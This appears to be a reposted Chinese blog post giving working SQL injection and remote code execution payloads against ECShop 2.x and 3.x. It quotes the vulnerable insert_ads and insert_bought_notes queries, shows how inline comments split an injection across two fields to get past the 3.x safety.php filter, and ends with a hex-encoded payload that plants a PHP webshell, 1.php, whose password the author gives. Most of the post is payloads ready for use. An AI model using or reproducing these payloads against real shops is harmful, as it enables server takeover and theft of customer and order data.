1. 程式人生 > >ecshop 2.x 3.x sql injection/rce payload

ecshop 2.x 3.x sql injection/rce payload

數據 file creat 版本 獲取數據 -s 公開 ant shell

首先,感謝ringk3y的分析:http://ringk3y.com/2018/08/31/ec ... %E6%89%A7%E8%A1%8C/ 大家跟一遍代碼基本上都能弄明白漏洞的原理,整個漏洞的構造還是很有意思的

然後網上公開的基本上都是2.x版本的payload,對於sql injection,除了文中提到的insert_ads,insert_bought_notes函數同樣存在漏洞:

    $sql = ‘SELECT u.user_name, og.goods_number, oi.add_time, IF(oi.order_status IN (2, 3, 4), 0, 1) AS order_status ‘ .
           ‘FROM ‘ . $GLOBALS[‘ecs‘]->table(‘order_info‘) . ‘ AS oi LEFT JOIN ‘ . $GLOBALS[‘ecs‘]->table(‘users‘) . ‘ AS u ON oi.user_id = u.user_id, ‘ . $GLOBALS[‘ecs‘]->table(‘order_goods‘) . ‘ AS og ‘ .
           ‘WHERE oi.order_id = og.order_id AND ‘ . time() . ‘ - oi.add_time < 2592000 AND og.goods_id = ‘ . $arr[‘id‘] . ‘ ORDER BY oi.add_time DESC LIMIT 5‘;

註入點為id,這樣我們構造payload可以為

554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:2:{s:3:"num";i:1;s:2:"id";s:70:"1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";}

對於3.x版本的註入,唯一和2.x的區別在於$_echash的值變成了45ea207d7a2b68c49582d2d22adf953a,我們直接替換原來payload中的值即可:

45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

或者

bought_notes|a:2:{s:3:"num";i:1;s:2:"id";s:70:"1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";}

對於3.x版本的rce或者是你想要讀取數據庫裏面的信息,我們需要繞過3.x中的過濾(代碼在safety.php中),
先看下3.x中的過濾:

‘sql‘=>"[^\\{\\s]{1}(\\s|\\b)+(?:select\\b|update\\b|insert(?:(\\/\\*.*?\\*\\/)|(\\s)|(\\+))+into\\b).+?(?:from\\b|set\\b)|[^\\{\\s]{1}(\\s|\\b)+(?:create|delete|drop|truncate|rename|desc)(?:(\\/\\*.*?\\*\\/)|(\\s)|(\\+))+(?:table\\b|from\\b|database\\b)|into(?:(\\/\\*.*?\\*\\/)|\\s|\\+)+(?:dump|out)file\\b|\\bsleep\\([\\s]*[\\d]+[\\s]*\\)|benchmark\\(([^\\,]*)\\,([^\\,]*)\\)|(?:declare|set|select)\\b.*@|union\\b.*(?:select|all)\\b|(?:select|update|insert|create|delete|drop|grant|truncate|rename|exec|desc|from|table|database|set|where)\\b.*(charset|ascii|bin|char|uncompress|concat|concat_ws|conv|export_set|hex|instr|left|load_file|locate|mid|sub|substring|oct|reverse|right|unhex)\\(|(?:master\\.\\.sysdatabases|msysaccessobjects|msysqueries|sysmodules|mysql\\.db|sys\\.database_name|information_schema\\.|sysobjects|sp_makewebtask|xp_cmdshell|sp_oamethod|sp_addextendedproc|sp_oacreate|xp_regread|sys\\.dbms_export_extension)"

基本上想從數據庫中通過select查詢獲取數據是不可能的(歡迎大家提供繞過的思路)
但是insert_ads的sql語句給我們繞過全局過濾帶來了方便:

$sql  = ‘SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, ‘ .
                    ‘p.ad_height, p.position_style, RAND() AS rnd ‘ .
                ‘FROM ‘ . $GLOBALS[‘ecs‘]->table(‘ad‘) . ‘ AS a ‘.
                ‘LEFT JOIN ‘ . $GLOBALS[‘ecs‘]->table(‘ad_position‘) . ‘ AS p ON a.position_id = p.position_id ‘ .
                "WHERE enabled = 1 AND start_time <= ‘" . $time . "‘ AND end_time >= ‘" . $time . "‘ ".
                    "AND a.position_id = ‘" . $arr[‘id‘] . "‘ " .
                ‘ORDER BY rnd LIMIT ‘ . $arr[‘num‘];

因為可以註入的地方有兩處,分別是id和num,這時我們利用inline comment來同時構造payload,id的地方註入‘union/*,num的地方註入*/select+....
關於如何使用comment來幫助我們的註入語句,可以參考:http://www.sqlinjection.net/comments/
然後攔截的正則規則中並沒有單獨攔截union,select,這樣我們2.x的payload稍微改造下就又能使用了:

45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:273:"*/select 1,0x27756e696f6e2f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152626132393358536b2f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:8:"‘union/*";}

執行完之後會在user.php同目錄下生成1.php的菜刀馬,密碼是kow

ecshop 2.x 3.x sql injection/rce payload